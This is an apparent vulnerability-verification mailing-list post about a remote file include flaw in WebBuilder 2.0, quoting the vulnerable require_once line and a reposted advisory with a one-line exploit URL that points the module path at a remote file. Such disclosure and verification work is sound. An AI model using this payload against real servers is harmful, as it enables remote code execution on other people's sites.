[VIM] true: WebBuilder <= 2.0 Remote File Include Vulnerability

str0ke str0ke at milw0rm.com
Thu Feb 1 14:52:41 EST 2007


The first line of code contains.

require_once($GLOBALS['core']['module_path'].'/module_common.php');

After looking at the www directory it contains an .htaccess file with
the following.

php_flag zlib.output_compression off
php_flag short_open_tag off
php_flag register_globals off
php_flag asp_tags off
php_flag magic_quotes_gpc off
php_flag magic_quotes_runtime off

I thought maybe the library directory wasn't supposed to be accessed
by http requests since there isn't an .htaccess file for it.

INSTALLATION notes:
To install the WebBuilder simply point your browser at www/index.php and enter
any requested information. This will setup your database and core configuration.

This shows accessing the library directory shouldn't be an issue.

/str0ke



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
WebBuilder <=  Remote File Include Vulnerability
             *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by GolD_M(Mahmnood_ali) & &  Contact: HackEr_ at W.Cn
             *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
URL:
             *
http://oss.backendmedia.com/snapshots/webbuilder2-2006-08-18.zip
             *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
V.CODE: In : /library/StageLoader.php
             *
require_once($GLOBALS['core']['module_path'].'/module_common.php');
             *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
             *
http://victim.com/[path]/library/StageLoader.php?GLOBALS[core][module_path]=Evil.txt?
    *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com &
Google.Com     *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/


More information about the VIM mailing list